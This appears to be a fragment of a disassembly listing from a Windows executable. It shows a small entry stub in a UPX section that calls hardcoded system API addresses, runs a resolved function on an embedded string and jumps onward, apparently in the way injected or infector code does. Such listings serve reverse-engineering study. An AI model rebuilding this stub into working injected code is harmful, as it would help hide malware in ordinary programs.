push eax
push ecx
push edx
push ebx
push esp
push ebp
push esi
push edi
pop eax
pop ecx
pop edx
loc_314282DC: ; CODE XREF: start�p
add [edx+52h], bl
start endp ; sp-analysis failed
push edx
mov ebx, 77E5D961h
call ebx
pop ebx
push ebx
add ebx, 0Ch
push ebx
push eax
mov ecx, 77E5B332h
call ecx
pop edx
push 1
; START OF FUNCTION CHUNK FOR start
loc_314282F8: ; CODE XREF: start+5�j
push 0
push 0
mov ecx, edx
add ecx, 1Ah
push ecx
push 0
push 0
loc_31428306: ; CODE XREF: start+17�j
call eax
mov eax, offset dword_31428200
jmp eax
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
align 10h
dd 3 dup(0)
db 0
byte_3142831D db 3 dup(0) ; CODE XREF: start+2D�j
dd 2 dup(0)
db 0
byte_31428329 db 3 dup(0) ; CODE XREF: start+2B�j
db 0
byte_3142832D db 3 dup(0) ; CODE XREF: start+3B�j
dd 7D6h dup(0)
dd 21h, 75Dh dup(0)
UPX2 ends
; Section 4. (virtual address 0000C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3142C000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start